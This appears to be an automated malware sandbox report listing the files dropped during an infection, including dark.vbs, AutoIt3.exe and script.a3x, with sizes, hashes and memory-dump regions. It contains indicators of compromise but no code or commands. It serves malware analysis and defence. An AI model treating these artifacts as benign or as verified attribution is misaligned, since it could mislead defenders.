C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.virustotal.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
d9a19d07f2a66544930fad25b0c0291f

SHA1
91b83c4cce0115f6ddb5ccda243e931219db8eb6

SHA256
6f5bf7d5a10ae448d86f4baccfe0b9278a8e12b4f8740a4f0d2fd220c3bed053

SHA512
af71b6646b44663b5edac2662bfc8a76b66c99feb90bb523dd9e352163fa3017c58a783393f8fbd715194a4813a159285b628eef7ba630e5c8270cb9869a48a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
d6c5d569451d5ed16644e5e86582feb2

SHA1
2ffb89cf7ce27e091b43e6b254d8cc3d42792819

SHA256
f8f46414cf397f9c4a05da003bffada5350ae4745b261d33d4553880d1d996fa

SHA512
d4cd72b63000690154e9a1b8665595bbf004f9bb57e89638b84355b77d081fc35b3d02368aea1c1a041f11c3584f7bd62903566865b5d175e8ce7a0285a85781

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
29123a6fb9942434084542fafe19a338

SHA1
20ca95640f8e2a3956b847c117ae1432f73902e9

SHA256
2cd415135d3f15da4667c3eda904f7eabe3cd2257e3eeb312f9ef59d1d514754

SHA512
c37ef2961733c5fea25571809447492a0b98cd8467ee9ffa8057c553648e35c22f5226536c712e485025e64647e5b48ade72cc6e4497abf3e2ade68c575b48ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
2ca225441826de4a5f5115f85e925839

SHA1
3d82edb9935139e51dc49b736a30d75741f0685b

SHA256
ea749531568f22c5b57016a006c9d090acc118b52f44c2ea10c4bb6fa692a074

SHA512
606cccf0b87f4176bfe836909a66bdc0ff579f8de5f2da3be20db0b4265e1854f79a3d216ab64e2aa95a0b48becb5e255c28af317c6ef526050e605a2a799a34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
711fc774a8dc3887c12ad63a83ca7437

SHA1
6df5b7150a87d2b3f077ea5b077723ca9f8d4ad9

SHA256
4962c95ac7a98c4256d7069f30f1199faacbe93959016405c32478d437631c5c

SHA512
4521585fcf90838644ad606b5ebfe819ee96363c9845544e8f3c4d61dfe42e573579cc5fc01da6dcc780bd64fcfe868303078623694c12c5042b3f79bf5398c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
74703f6b354c25f0b2f30b72c60b2e35

SHA1
67a482dcdfedb957bf0ea09b58a13466f0eee221

SHA256
b36685f867846cbb6c677cb80fceafb297f6a810620791901031ceb1bd572c65

SHA512
de1b3a7fff7734f2b390e7bea9995c99fcdba4accb8d825d2a4f280ea477ad7fcf65c1e1bda093b1b7ecb179411cad9ed70e523ec5f32e984bcc2ed901d854ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
18372b88af475b6fc5ea33282f80172d

SHA1
f1dcdfeade38cc7b93e6667e81ec83d53af31fb5

SHA256
9885ced3e5bebfb3752bb5c9dc8eb1a66e9ae15572d04609d4898e6a1016728f

SHA512
5380fa98b7190a7df7450b799c57ca9bf52afae83bfee12adf0cf88da90072dd72b49f36008ac7428aa2aae1665cfe44fb76d6768b4df30319bd376c658ceddf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
d8ad0fe98feaa633fea4f6e5c55f8a68

SHA1
4cabbbf5db8f0f9bed4faf14b6750da1a8f1c524

SHA256
f426c697e196f36a783680d3b50f592365fbbd6a3f1abef1a63801b56243ca7a

SHA512
cbc6db0aff601700fce0abaaef50700ffb1e479c495597d0423241df2dac46ff0d2a555ee9c0e60213e49e4044e2c705ff4cc2901c20d5209e9b84cde104aa41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Filesize
113KB

MD5
50ce02d886d405a53ae908d9e9ed1daa

SHA1
dfe3e955e96df198624b5f037627d6e7bd99ef7b

SHA256
14b968183f3c4859e2992b60d86981b2a015046e4a68c7c61282f1a144031b2c

SHA512
cbd2a3b8e0faea521e74dd98abd7efc93d3a1b9457cc9d9423acc1e36644140b14d533f7f7e9e27bf4481dc526585547b65bf2655d8c2793e360d7eb936808d2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
84e9a42a8a6b6fa308deb50ff75b5381

SHA1
104090532974261c8426cd1b8e56d7859db309e7

SHA256
4471981d493955089792756dacd1a7337d7f92e24bff7f96e2e014c13c7f2168

SHA512
581153f3cdc14dbd40c6647264202e4f100c1c4fa7c03a7f935df4e1219b332c33d5f3135219f317ace80442cbea6ecf54f206f7951701e7d134fd3d3fbd068d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
f3eadeb403daeb4790d257eff9082951

SHA1
39609a1780d0469635210f062999c18248d8c7c9

SHA256
51e342a0bef99061ebebf137ecd338abb39b8c5a40ad97f1219e394a8d06cdab

SHA512
9743244f78a96dc24a08d510cfc254b86475991d321b31deb6b3c0e3e6abba96b8b71d28432e8a304240e92a4ff17c8f9bbd740e70013b51365e442d2c4fa778

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a0e88.TMP

Filesize
48B

MD5
43c5a433b63dcf9b75f377c2c2543764

SHA1
9681ba13360066ea86ee5e0079be1f172fa3a89f

SHA256
c52b4a55c569d565590821ead7ccad78786fe997cc728404edc4655ef33cb8dc

SHA512
e02b06796928e2cbd75b152951bc20dc853ec9c7b5ba1ad9ed8d70beff366a00e6fcc9b2823493bf68252c49a84a66aa7b96bba0dfd922002e9c8100dda835a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
7a2901dabf7728fa6d81cebf3a30224b

SHA1
23155add08fa43cd48f0b428dce54ee81e001caa

SHA256
a89a193a021e4394c5cf4fb88d69937e02d5a7ca1033735a960a1c30e1cfb6eb

SHA512
e39ccd5da17818298ffcddf262241279ef180cf1f43ec3e786f0ac40da9311269dc32a8556c5b5b62af9530dc9bd6ee8b3ec9b5240be2d1d9779001ee0199edd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
fce453367a8791608458cd53f119167f

SHA1
5387496f47344ff2976ed0a80504f8fd50d3fbc4

SHA256
db96e414534848a2b664189987053ac16c830f856e310841cbb0a981e9bbb1c4

SHA512
cd7986bf487c3f6d98a39a31be05a673b4b6a1f22dfba4ff65c2870c5484a77c505f18931f11c8d093656516ec2754aad2072ed85b5588a60ba0677fbce17f4c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
128KB

MD5
68f3d3b3e8e34aaf7c8560b72e15e7d8

SHA1
96687d1d36a6e76a9d4c5a85300c53dcd6dd9000

SHA256
67c33b151a338b08cc69d7578da6d4bf19ffca54d69bff340667cf8d6c5c81ea

SHA512
4072a7a150c4a164cae795afc2b93f21e792a82150270125c8a0b3d17cbba1d4105d7312d548e7bcc18b42ae2be3b5f63e76f3c399f90741f71e1e1f17cd7ba3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\e86f7b29-67df-4a85-976b-7a841b09b92a.tmp

Filesize
128KB

MD5
7725c40677f19929c79997b638455f22

SHA1
f4ea353730b390f45ee522425ec63b81b0c13f89

SHA256
c3ff393b02fe53758deadecf9616bf26d1bee42d6946fde4d3be33171291e26e

SHA512
63a2eea0bf381c50103009b927b2b709ea804a4f69462df6e81dffc484b2fcd4bf6f9b867b235c442592eb89b4cd1a6c0a4c7f714d923aa56b25cb7df7805439

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
d5472c2bc54ec427647ebc556fe38a54

SHA1
0de53240e795d3352d523cb9122f81007b0a3c84

SHA256
6dea912dfcabf12389005048070cb306e5841665e4a847f1490e75c4047f2237

SHA512
b33a4cee624eee007e548c55b0ddee4ba580e7f95f2a1650d68cd246a7fd65aaad75cb7a7658bd061d8fc0140ac137b79a28509287e421316770caf21d8c7d29

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3yjc50jm.b5m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\KcbcdAK

Filesize
32B

MD5
c7ed7e8576175d0b6c52c69e0166afcb

SHA1
d93ffbdf226d3595faea9a1059d189a7311e4936

SHA256
82486167cbf5e79cbca4621576be5af013acf85ce07d5ee978dbf89b12bef365

SHA512
2943d6b589d233f25c0a47a04ebb675f71b90d0c793930be9833ef17dfc52e717b3b8878b1ada36bdafcd307838a55ce1346e10a26d57c1a94ff89d70bb53443

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
b738e9a5768a688319cc263676857239

SHA1
f8b38109f570cb397a26ff03201ea49174310389

SHA256
d5dc6a0d579602edb7e1ffa0ec44181a9a1bbe845ac303ea0d747bb14244faf9

SHA512
df5eafb5424c0dfb4795d978ad4dc4b97cf2fdc27df225706154628eb940b8202c3c24755aafaa7dc9af4e418da274d3d384a0c756a90a6bcaf89cdda9d16e78

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
5KB

MD5
b5e71151cacfed56c5ddb0b77eb14d4d

SHA1
6b194d547c310d2d8840146be7ee1a2f970d3a10

SHA256
897a831053d2e4160c4ba6e0195d56dd649cb18f16d79d398d6cd52d7bc565cb

SHA512
37fee48a48c85ac0a0e2e230e6033fc676f4cf97b2666dc984742c81dae2564ae790ec75d45de5543743aaa7b8a2136f8dde2100350a8613294023ba82a034b8

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 290301.crdownload

Filesize
1.5MB

MD5
ed4b8b0a4cb81d8664555d320cbb6cdc

SHA1
161c6f930b4acd80e596017b9a1f958959a87aac

SHA256
a2fa59de912519d7ad8d63f9ef40ae7a85f916468607639a70058b0145e40e63

SHA512
231f2c97d6075d1ee6d7258030b2576806b364c6b5babb25f4b933fd8fe446dc752c1a2c33147de81837b797cf6decc1db9e038f90c451d4cd35d7969f7b5050

Download Submit
C:\Users\Admin\Downloads\dark.rar

Filesize
1KB

MD5
b60cccf4625b92d66e5a3e6c916b47b4

SHA1
977384d8b0bbd2025b561e57817efb4caccd772e

SHA256
01934d2d54012d3a19ccaf2719a7a0f59ebd33f1a1c7e57cb72a67cc5e9bec62

SHA512
f2839e2220ea6f8613ddb07922accae7ec5f7e05e839a1c69da165b88bfc002dd2358d17a4862d5a49e3327f394f9d64494a4c18afffec4b4ab17e68901c6437

Download Submit
C:\Users\Admin\Downloads\dark.vbs

Filesize
3KB

MD5
96921f7c923278a830035161745e47c4

SHA1
1786c0d5a6049b62ad5b2a9188db1c9dd0574ed0

SHA256
8de7c3ebf246e29aecaebc0bd38485d0618ae9ecf2bd45e0f412a73174bebf11

SHA512
33c05c0e08700925bd7f5f351beaff560a4cff53dc8a145100b7d07e08e3ee3273dfa6c2ec68cabe32de674eb94cecb472794fe3870b4d3b4ecf246ddd4779f7

Download Submit
C:\temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\temp\ecfbhhb

Filesize
4B

MD5
ab9649a77a9d892a8c24bd1e0dc472be

SHA1
e6df63941c7f23a4cebaecb9e387d41e3eff5d9e

SHA256
0d48be1de99618c0e6b34e200a29fa24b76a3bee4c009ce2e6a56e0e96a99558

SHA512
2061cc6e1d326b4d90a40f5cac4f2093f0dde05b0455d0f20f1a7d68a3537e24556820b75a745284d0b4deb493918fc83a2006528ae86681d76e33e6175de152

Download Submit
C:\temp\ecfbhhb

Filesize
4B

MD5
d7b98f8c72b1ced6d3efaf9f14baf45f

SHA1
75b98d4237c760ed587b75c0f8c3ccdc744b805c

SHA256
61f6de3a836787e34a9496223b75b490c2adc3fe00d92dc0b43314caaa7a65e3

SHA512
2fd42e828a9c77dd89085d66c4ee6c7a4fcb81253efa2bd1b2f8e4673741f23f091b3da39cb43640acca4d2db6298be232de2ceefb0d2dd49f2e1687698d9de4

Download Submit
C:\temp\fegebhg

Filesize
4B

MD5
0d893dd4eccc7707dc3715a969c6e731

SHA1
20975909293de07106646ad78a145c9d5b07a1d3

SHA256
742e2cf10d55fb9da7bfda93b595acbae45297e83fb9cfe8b3ca6b15aa933a22

SHA512
11bb9437a1393400edb6d6d7565da4539e875ee6d2dbcb625e8f0d667afb7f60decd8eecfbd33a13639b1b4316bf2d3720808aea32e0edb2357757fcbc4c1ea0

Download Submit
C:\temp\script.a3x

Filesize
467KB

MD5
50862376b34880a80a32406444f4a8cb

SHA1
20997faf801af300f4524b5a785d1f246bb79f49

SHA256
508251503639845117e170fe5ae1b0d7b8953e8336119a71d04e7bdce962d980

SHA512
c17fc05332ce333f3dcae3e6d0524386500953cb48e55996516913cdb9b415d4c940c59a8311efc31663ae4c6710f44b18ba63016cb9f100ffe8edf0985a0f7d

Download Submit
C:\temp\test.txt

Filesize
76B

MD5
e12c09ed641531b7225b26ff6991a506

SHA1
697ec598b870b394d237b9bccf4eef18e1619ee5

SHA256
692f4ba2a4bce266d9228dd0a3e11a5cd2e4b201b5ce459eef64dcb9d043f73c

SHA512
8370d91bc0dc6c0e924e45658f6e62ec04d3f2654133c6799ab0e7f839a52556db4e04615dadda9fc97a88b3a18916e4fb286efccc6713b9a4e8cd8700915b83

Download Submit
memory/1136-201-0x0000026777E50000-0x0000026777E60000-memory.dmp

Filesize
64KB

Download
memory/1136-204-0x00000267785F0000-0x00000267787B2000-memory.dmp

Filesize
1.8MB

Download
memory/1136-200-0x00007FFB316D0000-0x00007FFB32191000-memory.dmp

Filesize
10.8MB

Download
memory/1136-202-0x0000026777E50000-0x0000026777E60000-memory.dmp

Filesize
64KB

Download
memory/1136-223-0x00007FFB316D0000-0x00007FFB32191000-memory.dmp

Filesize
10.8MB

Download
memory/1136-218-0x0000026777E50000-0x0000026777E60000-memory.dmp

Filesize
64KB

Download
memory/1136-217-0x0000026777E50000-0x0000026777E60000-memory.dmp

Filesize
64KB

Download
memory/1288-100-0x0000000002A10000-0x00000000031B2000-memory.dmp

Filesize
7.6MB

Download
memory/1288-74-0x0000000002A10000-0x00000000031B2000-memory.dmp

Filesize
7.6MB

Download
memory/1288-79-0x0000000002A10000-0x00000000031B2000-memory.dmp

Filesize
7.6MB

Download
memory/1288-85-0x0000000002A10000-0x00000000031B2000-memory.dmp

Filesize
7.6MB

Download
memory/1288-86-0x0000000002A10000-0x00000000031B2000-memory.dmp

Filesize
7.6MB

Download
memory/1288-87-0x0000000002A10000-0x00000000031B2000-memory.dmp

Filesize
7.6MB

Download
memory/1564-65-0x0000000006120000-0x000000000646F000-memory.dmp

Filesize
3.3MB

Download
memory/1564-64-0x0000000004C30000-0x0000000005C00000-memory.dmp

Filesize
15.8MB

Download
memory/1564-75-0x0000000006120000-0x000000000646F000-memory.dmp

Filesize
3.3MB

Download
memory/2052-90-0x0000000003040000-0x00000000037E2000-memory.dmp

Filesize
7.6MB

Download
memory/2052-84-0x0000000003040000-0x00000000037E2000-memory.dmp

Filesize
7.6MB

Download
memory/2052-101-0x0000000003040000-0x00000000037E2000-memory.dmp

Filesize
7.6MB

Download
memory/2668-173-0x00007FFB316D0000-0x00007FFB32191000-memory.dmp

Filesize
10.8MB

Download
memory/2668-182-0x0000013C7D1B0000-0x0000013C7D1CE000-memory.dmp

Filesize
120KB

Download
memory/2668-181-0x0000013C7CD10000-0x0000013C7CD20000-memory.dmp

Filesize
64KB

Download
memory/2668-179-0x0000013C7CD10000-0x0000013C7CD20000-memory.dmp

Filesize
64KB

Download
memory/2668-178-0x00007FFB316D0000-0x00007FFB32191000-memory.dmp

Filesize
10.8MB

Download
memory/2668-174-0x0000013C7CD10000-0x0000013C7CD20000-memory.dmp

Filesize
64KB

Download
memory/3104-142-0x00007FFB316D0000-0x00007FFB32191000-memory.dmp

Filesize
10.8MB

Download
memory/3104-157-0x00007FFB316D0000-0x00007FFB32191000-memory.dmp

Filesize
10.8MB

Download
memory/3104-132-0x000001EFB3440000-0x000001EFB3462000-memory.dmp

Filesize
136KB

Download
memory/3104-146-0x000001EFCD110000-0x000001EFCD186000-memory.dmp

Filesize
472KB

Download
memory/3104-143-0x000001EFCCCF0000-0x000001EFCCD00000-memory.dmp

Filesize
64KB

Download
memory/3104-145-0x000001EFCD040000-0x000001EFCD084000-memory.dmp

Filesize
272KB

Download
memory/3104-144-0x000001EFCCCF0000-0x000001EFCCD00000-memory.dmp

Filesize
64KB

Download
memory/4876-226-0x0000000005940000-0x0000000005C8F000-memory.dmp

Filesize
3.3MB

Download
memory/4876-224-0x0000000004450000-0x0000000005420000-memory.dmp

Filesize
15.8MB

Download
memory/4876-225-0x0000000005940000-0x0000000005C8F000-memory.dmp

Filesize
3.3MB

Download